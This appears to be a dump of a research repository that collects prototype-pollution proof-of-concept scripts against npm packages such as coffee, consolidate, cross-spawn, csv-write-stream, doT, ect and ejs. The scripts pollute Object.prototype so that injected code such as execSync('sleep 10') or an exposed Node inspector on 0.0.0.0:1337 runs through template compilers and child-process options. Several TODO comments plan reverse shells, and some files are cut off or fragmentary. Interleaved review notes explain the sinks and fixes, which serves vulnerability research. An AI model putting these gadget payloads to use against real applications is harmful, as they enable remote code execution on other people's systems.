"index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "chrome-launcher": "^0.15.2" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/coffee/coffee.fork.PoC.js: -------------------------------------------------------------------------------- 1 | const coffee = require('coffee'); 2 | 3 | if (process.argv[2] === 'child') { 4 | console.log(`Hello from ${process.argv[2]}!`); 5 | } else { 6 | 7 | // you can also control the options parameter for child_process.fork() 8 | // TODO: try to get reverse shell 9 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' }; 10 | 11 | coffee.fork(__filename, ['child']).debug(); 12 | } -------------------------------------------------------------------------------- /npm-packages/coffee/coffee.spawn.PoC.js: -------------------------------------------------------------------------------- 1 | const coffee = require('coffee'); 2 | 3 | // TODO: test a reverse shell for Linux 4 | 5 | Object.prototype.shell = 'node'; 6 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' }; 7 | 8 | coffee.spawn('cat') 9 | .write('1') 10 | .write('2') 11 | .expect('stdout', '12') 12 | .expect('code', 0) 13 | .end(); -------------------------------------------------------------------------------- /npm-packages/coffee/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "coffee-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "coffee": "^5.5.0" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/colors.js: -------------------------------------------------------------------------------- 1 | console.log('PWNED') -------------------------------------------------------------------------------- /npm-packages/consolidate/jazz.PoC.js: 
--------------------------------------------------------------------------------
// Review note: the polluted key is the same string as the template path and
// `cache` is forced to true, so the PoC presumably relies on consolidate's
// template cache being a plain object whose lookups fall through to
// Object.prototype, making the polluted string act as the cached template
// (confirm against consolidate 0.16.0, pinned in package.json below).
// A Map or Object.create(null) cache, or an Object.hasOwn() check on lookup,
// removes the inherited-key read.
1 | var cons = require('consolidate');
2 |
3 | Object.prototype['views/page.html'] = 'console.log("PWNED")';
4 | Object.prototype.cache = true;
5 |
6 | cons.jazz('views/page.html', { user: 'tobi' })
7 |   .then(function (html) {
8 |     console.log(html);
9 |   })
10 |   .catch(function (err) {
11 |     throw err;
12 |   });
--------------------------------------------------------------------------------
/npm-packages/consolidate/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "consolidate-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "consolidate": "0.16.0",
10 |     "jazz": "^0.0.18",
11 |     "underscore": "^1.13.6"
12 |   }
13 | }
14 |
--------------------------------------------------------------------------------
/npm-packages/consolidate/underscore.PoC.js:
--------------------------------------------------------------------------------
// Review note: here an arbitrary inherited key (`aaa`) carries the JavaScript
// string and `cache` is left unpolluted (the line is commented out). How that
// key reaches generated template code is not visible from this file -
// presumably inherited keys are enumerated somewhere between consolidate and
// the underscore template compiler; confirm before relying on it.
1 | var cons = require('consolidate');
2 |
3 | Object.prototype.aaa = 'console.log("PWNED")';
4 | // Object.prototype.cache = true;
5 |
6 | cons.underscore('views/underscore.template.html', { name: 'tobi' })
7 |   .then(function (html) {
8 |     console.log(html);
9 |   })
10 |   .catch(function (err) {
11 |     throw err;
12 |   });
13 |
--------------------------------------------------------------------------------
/npm-packages/consolidate/views/underscore.template.html:
--------------------------------------------------------------------------------
1 | <%- name %>
--------------------------------------------------------------------------------
/npm-packages/crawler/crawler.PoC.js:
--------------------------------------------------------------------------------
// Review note: `repo` is polluted with the placeholder string 'payload'; which
// code path in crawler consumes it is not shown in this file.
1 | const Crawler = require('crawler');
2 |
3 | Object.prototype.repo = 'payload';
4 |
5 | const c = new Crawler({
6 |   maxConnections: 10,
7 |   // This will be
called for each crawled page
8 |   callback: (error, res, done) => {
9 |     if (error) {
10 |       console.log(error);
11 |     } else {
12 |       const $ = res.$;
13 |       // $ is Cheerio by default
14 |       // a lean implementation of core jQuery designed specifically for the server
15 |       console.log($('title').text());
16 |     }
17 |     done();
18 |   }
19 | });
20 |
21 | // Queue just one URL, with default callback
22 | c.queue('http://www.amazon.com'); // NOTE(review): live request to a third-party site; a local fixture server would keep the PoC self-contained
--------------------------------------------------------------------------------
/npm-packages/crawler/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "crawler-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "crawler": "^1.4.0"
10 |   }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/cross-port-killer.PoC.js:
--------------------------------------------------------------------------------
// Review note: `shell` and `env` are polluted on Object.prototype and the
// gadget is reached through kill(9090). Presumably cross-port-killer starts a
// child process to find the owner of the port and its options object inherits
// both keys (confirm against cross-port-killer 1.4.0, the version resolved in
// the lockfile). The inspector address in NODE_OPTIONS listens on every
// interface; 127.0.0.1 demonstrates the same effect without exposing it.
1 | const { kill } = require('cross-port-killer');
2 |
3 | Object.prototype.shell = 'node'
4 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' };
5 |
6 | // TODO: try a reverse shell on Linux
7 |
8 | kill(9090).then(pids => {
9 |   console.log(pids)
10 | })
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "cross-port-killer-gadgets",
3 |   "version": "1.0.0",
4 |   "lockfileVersion": 2,
5 |   "requires": true,
6 |   "packages": {
7 |     "": {
8 |       "name": "cross-port-killer-gadgets",
9 |       "version": "1.0.0",
10 |       "license": "MIT",
11 |       "dependencies": {
12 |         "cross-port-killer": "^1.4.0"
13 |       }
14 |     },
15 |     "node_modules/cross-port-killer": {
16 |       "version": "1.4.0",
17 |       "resolved":
"https://registry.npmjs.org/cross-port-killer/-/cross-port-killer-1.4.0.tgz",
18 |       "integrity": "sha512-ujqfftKsSeorFMVI6JP25xMBixHEaDWVK+NarRZAGnJjR5AhebRQU+g+k/Lj8OHwM6f+wrrs8u5kkCdI7RLtxQ==",
19 |       "bin": {
20 |         "kill-port": "source/cli.js"
21 |       }
22 |     }
23 |   },
24 |   "dependencies": {
25 |     "cross-port-killer": {
26 |       "version": "1.4.0",
27 |       "resolved": "https://registry.npmjs.org/cross-port-killer/-/cross-port-killer-1.4.0.tgz",
28 |       "integrity": "sha512-ujqfftKsSeorFMVI6JP25xMBixHEaDWVK+NarRZAGnJjR5AhebRQU+g+k/Lj8OHwM6f+wrrs8u5kkCdI7RLtxQ=="
29 |     }
30 |   }
31 | }
32 |
--------------------------------------------------------------------------------
/npm-packages/cross-port-killer/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "cross-port-killer-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "cross-port-killer": "^1.4.0"
10 |   }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/cross-spawn.spawn.PoC.js:
--------------------------------------------------------------------------------
// Review note: NODE_OPTIONS is polluted directly on Object.prototype here, not
// inside an `env` object, so the PoC presumably depends on the child's
// environment being assembled from an object whose inherited keys are copied
// as well (confirm against the cross-spawn and Node versions actually used).
// The explicit `{ stdio: 'inherit' }` literal does not shield the call: keys
// it does not define itself, such as `shell`, still resolve through the
// prototype chain. Setting `shell` and `env` explicitly on a prototype-less
// options object is the caller-side mitigation.
1 | const spawn = require('cross-spawn');
2 |
3 | Object.prototype.shell = "node";
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | // TODO: try a reverse shell
7 |
8 | const child = spawn('npm', ['list', '-g', '-depth', '0'], { stdio: 'inherit' });
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/cross-spawn.spawn.sync.PoC.js:
--------------------------------------------------------------------------------
// Review note: synchronous variant of the same pollution, exercised through
// spawn.sync() instead of spawn().
1 | const spawn = require('cross-spawn');
2 |
3 | Object.prototype.shell = "node";
4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337';
5 |
6 | // TODO: try a reverse shell
7 |
8 | const result = spawn.sync('npm', ['list', '-g', '-depth', '0'], { stdio:
'inherit' });
--------------------------------------------------------------------------------
/npm-packages/cross-spawn/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "cross-spawn-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "cross-spawn": "^7.0.3"
10 |   }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/csv-write-stream.PoC.js:
--------------------------------------------------------------------------------
// Review note: the polluted `separator` closes a double-quoted string, adds a
// statement and reopens the string (`";...;result+="`). That shape only has an
// effect if csv-write-stream builds JavaScript source with the separator
// concatenated inside a string literal, i.e. a code-generation sink -
// presumably; confirm against csv-write-stream ^2.0.0. csvWriter() is called
// without options, so a `separator` lookup can only be satisfied by a library
// default or by the prototype.
// Library-side fix for this class: read options as own properties and embed
// values in generated code through JSON.stringify() rather than raw
// concatenation.
1 | const fs = require('fs')
2 |
3 | const csvWriter = require('csv-write-stream')
4 |
5 | const payload = 'console.log("PWNED")';
6 | Object.prototype.separator = `,";${payload};result+="`;
7 |
8 | const writer = csvWriter()
9 | writer.pipe(fs.createWriteStream('out.csv'))
10 | writer.write({hello: "world", foo: "bar", baz: "taco"})
11 | writer.end()
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/out.csv:
--------------------------------------------------------------------------------
1 | hello,foo,baz
2 | world,bar,taco
3 |
--------------------------------------------------------------------------------
/npm-packages/csv-write-stream/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "csv-write-stream-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "csv-write-stream": "^2.0.0"
10 |   }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/divx.js:
--------------------------------------------------------------------------------
// Review note: marker script; its only effect is printing PWNED. Which PoC
// causes it to be loaded is not shown in this file.
1 | console.log('PWNED')
--------------------------------------------------------------------------------
/npm-packages/doT/app-0.js:
--------------------------------------------------------------------------------
// Review note: `global` is polluted with a string shaped to close a generated
// block and append a call. That only has an effect if dot interpolates the
// setting into the module source it writes when doT.process() compiles the
// templates under views/ (this script then loads views/mytemplate.js with
// require) - presumably that is the sink; confirm against the resolved
// version. The lockfile in this directory resolves dot 1.0.3 although its
// name field reads doT@1.1.3, so results apply to 1.0.3 as installed.
// The payload is a `sleep 10` timing marker. If the sink is code written to
// disk, a polluted run leaves the injected text in the generated .js file
// until it is regenerated, so cleanup has to include the compiled output.
1 | 'use strict';
2 |
3 | var doT = require('dot');
4 |
5 | Object.prototype.global = "}process.mainModule.require('child_process').execSync(\`sleep 10\`)}())//";
6 |
7 | const templates = doT.process({path: __dirname+'/views'});
8 | var mytemplate = require(__dirname+'/views/mytemplate.js')
--------------------------------------------------------------------------------
/npm-packages/doT/app-1.js:
--------------------------------------------------------------------------------
// Review note: only `destination` is polluted here - presumably the option
// that tells doT.process() where to write compiled templates - so this PoC
// shows an inherited key redirecting generated output (to "./") rather than
// injecting code. Confirm against the resolved dot version.
1 | 'use strict';
2 |
3 | var doT = require('dot');
4 |
5 | Object.prototype.destination = "./"
6 |
7 | const templates = doT.process({path: __dirname+'/views'});
8 | var mytemplate = require(__dirname+'/views/mytemplate.js')
--------------------------------------------------------------------------------
/npm-packages/doT/package-lock.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "doT@1.1.3",
3 |   "lockfileVersion": 2,
4 |   "requires": true,
5 |   "packages": {
6 |     "": {
7 |       "dependencies": {
8 |         "dot": "^1.0.3"
9 |       }
10 |     },
11 |     "node_modules/dot": {
12 |       "version": "1.0.3",
13 |       "resolved": "https://registry.npmjs.org/dot/-/dot-1.0.3.tgz",
14 |       "integrity": "sha512-b0ilWM9qrWChYO1D1cXgx6Z47nzKR3tTsiPBnhUZF02+vGj9iHXP0QhUcKIdk+VRSXeFvMqtJjAXALJBAq7R3A==",
15 |       "engines": [
16 |         "node >=0.2.6"
17 |       ],
18 |       "bin": {
19 |         "dottojs": "bin/dot-packer"
20 |       }
21 |     }
22 |   },
23 |   "dependencies": {
24 |     "dot": {
25 |       "version": "1.0.3",
26 |       "resolved": "https://registry.npmjs.org/dot/-/dot-1.0.3.tgz",
27 |       "integrity": "sha512-b0ilWM9qrWChYO1D1cXgx6Z47nzKR3tTsiPBnhUZF02+vGj9iHXP0QhUcKIdk+VRSXeFvMqtJjAXALJBAq7R3A=="
28 |     }
29 |   }
30 | }
31 |
--------------------------------------------------------------------------------
/npm-packages/doT/package.json:
--------------------------------------------------------------------------------
1 |
{
2 |   "dependencies": {
3 |     "dot": "^1.0.3"
4 |   }
5 | }
6 |
--------------------------------------------------------------------------------
/npm-packages/doT/views/mytemplate.jst:
--------------------------------------------------------------------------------
1 | {{=it && it.data}}
2 | {{#def.test}}
--------------------------------------------------------------------------------
/npm-packages/doT/views/test.def:
--------------------------------------------------------------------------------
1 | 1
--------------------------------------------------------------------------------
/npm-packages/doT/views/test.dot:
--------------------------------------------------------------------------------
1 | {{=it && it.data}}
2 | {{#def.test}}
--------------------------------------------------------------------------------
/npm-packages/dockerfile_lint/dockerfile_lint.PoC.js:
--------------------------------------------------------------------------------
// Review note: the polluted `arrays.regex` value is JavaScript source, not a
// pattern, so the PoC presumably targets a place where dockerfile_lint turns
// a `regex` string into executable code while the validator is constructed;
// that sink is not visible here (confirm against dockerfile_lint ^0.3.4).
// Library-side, compiling patterns with new RegExp() from own properties
// only, never through an evaluator, removes this class of gadget.
1 | var path = require('path');
2 | var DockerFileValidator = require('dockerfile_lint');
3 |
4 | Object.prototype.arrays = { regex: "console.log('PWNED')" };
5 |
6 | var validator = new DockerFileValidator(path.join(__dirname, 'dockerfile_rules.yml'));
7 |
--------------------------------------------------------------------------------
/npm-packages/dockerfile_lint/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "dockerfile_lint-gadgets",
3 |   "version": "1.0.0",
4 |   "description": "",
5 |   "main": "index.js",
6 |   "author": "",
7 |   "license": "MIT",
8 |   "dependencies": {
9 |     "dockerfile_lint": "^0.3.4"
10 |   }
11 | }
12 |
--------------------------------------------------------------------------------
/npm-packages/dot/dot.PoC.js:
--------------------------------------------------------------------------------
// Review note: an arbitrary inherited key (`aaa`) holds the JavaScript string
// and the compiled template is never invoked (those calls are commented out),
// so any effect would have to occur inside dotPkg.process() itself -
// presumably while inherited keys are enumerated during compilation; confirm
// against the dot version installed for this directory.
1 | var dotPkg = require("dot");
2 |
3 | Object.prototype.aaa = 'console.log("PWNED")'
4 |
5 | var dots = dotPkg.process({path: "./views"});
6 | // var res
= dots.mytemplate({foo:"hello world"}); 7 | // console.log(res); -------------------------------------------------------------------------------- /npm-packages/dot/package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "dot-gadgets", 3 | "version": "1.0.0", 4 | "lockfileVersion": 2, 5 | "requires": true, 6 | "packages": { 7 | "": { 8 | "name": "dot-gadgets", 9 | "version": "1.0.0", 10 | "license": "MIT", 11 | "dependencies": { 12 | "dot": "^1.1.3" 13 | } 14 | }, 15 | "node_modules/dot": { 16 | "version": "1.1.3", 17 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.1.3.tgz", 18 | "integrity": "sha512-/nt74Rm+PcfnirXGEdhZleTwGC2LMnuKTeeTIlI82xb5loBBoXNYzr2ezCroPSMtilK8EZIfcNZwOcHN+ib1Lg==", 19 | "engines": [ 20 | "node >=0.2.6" 21 | ], 22 | "bin": { 23 | "dottojs": "bin/dot-packer" 24 | } 25 | } 26 | }, 27 | "dependencies": { 28 | "dot": { 29 | "version": "1.1.3", 30 | "resolved": "https://registry.npmjs.org/dot/-/dot-1.1.3.tgz", 31 | "integrity": "sha512-/nt74Rm+PcfnirXGEdhZleTwGC2LMnuKTeeTIlI82xb5loBBoXNYzr2ezCroPSMtilK8EZIfcNZwOcHN+ib1Lg==" 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /npm-packages/dot/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "dot-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "dot": "1.1.3" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/dot/views/mytemplate.jst: -------------------------------------------------------------------------------- 1 |
Page content
' 8 | } 9 | }); 10 | 11 | var html = renderer.render('page', { title: 'Hello, World!' }); 12 | 13 | -------------------------------------------------------------------------------- /npm-packages/ect/app-1.js: -------------------------------------------------------------------------------- 1 | var ECT = require('ect'); 2 | 3 | Object.prototype.inlineMap = true; 4 | Object.prototype.filename = "\n})\nprocess.mainModule.require('child_process').execSync('sleep 10')\n({"; 5 | 6 | 7 | var renderer = ECT({ root : { 8 | layout: 'Page content
' 10 | } 11 | }); 12 | 13 | var html = renderer.render('page', { title: 'Hello, World!' }); 14 | 15 | -------------------------------------------------------------------------------- /npm-packages/ect/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "ect": "^0.5.9" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /npm-packages/ect/views/extra.ect: -------------------------------------------------------------------------------- 1 |Footer content
-------------------------------------------------------------------------------- /npm-packages/ect/views/header.html: -------------------------------------------------------------------------------- 1 |3 | Page content 4 |
5 | <% block 'side1' : %> 6 | redefined side1 content 7 | <% end %> 8 | <% block 'side2' : %> 9 | side2 content 10 | <% end %> 11 | -------------------------------------------------------------------------------- /npm-packages/ect/views/sublayout.html: -------------------------------------------------------------------------------- 1 | <% extend 'layout' %> 2 |Today is <%= date %>.
11 | `;
12 |
13 | // Compile the template string into a template function
14 | const templateFunction = ejs.compile(templateString);
15 |
16 | // Define the data object
17 | const data = {
18 |   name: 'John Doe',
19 |   date: new Date().toLocaleDateString()
20 | };
21 |
22 | // Render the template with the data object
23 | const output = templateFunction(data);
24 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-1.js:
--------------------------------------------------------------------------------
// Review note: `client` and `escapeFunction` are EJS compile options. The PoC
// premise is that, with `client` inherited as true, EJS writes the escape
// function's source into the compiled template, so the inherited
// `escapeFunction` string becomes part of generated code (presumably - the
// EJS source is not shown here; confirm against the installed version).
// The payload is a `sleep 10` timing marker. renderFile() receives only
// template data, so options it is not given explicitly are presumably open to
// inherited values.
// Hardening: pass an options object built on Object.create(null) with every
// code-affecting option set explicitly, and stay on a maintained EJS release.
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 | Object.prototype.client = true
6 | Object.prototype.escapeFunction = "false;\nprocess.mainModule.require('child_process').execSync(\`sleep 10\`)\n"
7 |
8 | var result = ejs.renderFile(templatePath, {
9 |   title:" storeHtml | logins ",
10 |   buttonHintF:"login",
11 |   buttonHintS:"No account? Register now",
12 |   hint:"login",
13 |   next:"/register"
14 | })
15 |
16 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-2.js:
--------------------------------------------------------------------------------
// Review note: `destructuredLocals` is an EJS option holding a list of local
// names. The polluted entry is a statement sequence rather than an
// identifier, so the PoC presumably depends on EJS emitting those names into
// the generated function without validating them (confirm against the
// installed version). Checking such names against an identifier pattern
// before code generation is the library-side fix; the payload is a
// `sleep 10` timing marker.
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 |
6 | Object.prototype.destructuredLocals = ["__line=__line;global.process.mainModule.require('child_process').exec('bash -c \"sleep 10\"');//"]
7 |
8 |
9 | var result = ejs.renderFile(templatePath, {
10 |   title:" storeHtml | logins ",
11 |   buttonHintF:"login",
12 |   buttonHintS:"No account?
Register now",
13 |   hint:"login",
14 |   next:"/register"
15 | })
16 |
17 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/app-3.js:
--------------------------------------------------------------------------------
// Review note: `localsName` is the EJS option that names the data object
// inside the generated template function. The polluted value is an assignment
// expression instead of a plain identifier, so the PoC presumably depends on
// that name being written into generated code unvalidated (confirm against
// the installed version). The payload is a `sleep 10` timing marker.
// package.json below declares the range ^2.7.4 rather than an exact pin, so
// the result depends on the EJS version actually installed.
1 | const ejs = require('ejs')
2 | const path = require('path');
3 | const templatePath = path.join(__dirname, 'views', 'login_register.ejs');
4 |
5 | Object.prototype.localsName = "it=process.mainModule.require('child_process').execSync(\`sleep 10\`)"
6 |
7 | var result = ejs.renderFile(templatePath, {
8 |   title:" storeHtml | logins ",
9 |   buttonHintF:"login",
10 |   buttonHintS:"No account? Register now",
11 |   hint:"login",
12 |   next:"/register"
13 | })
14 |
15 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "htmlstore",
3 |   "version": "1.0.0",
4 |   "description": "htmlStore will help you store html file.",
5 |   "main": "server.js",
6 |   "scripts": {
7 |     "test": "echo \"Error: no test specified\" && exit 1"
8 |   },
9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "ejs": "^2.7.4",
13 |     "express": "^4.17.1"
14 |   }
15 | }
16 |
--------------------------------------------------------------------------------
/npm-packages/ejs@2.7.4/views/footer.ejs:
--------------------------------------------------------------------------------
1 | 4 |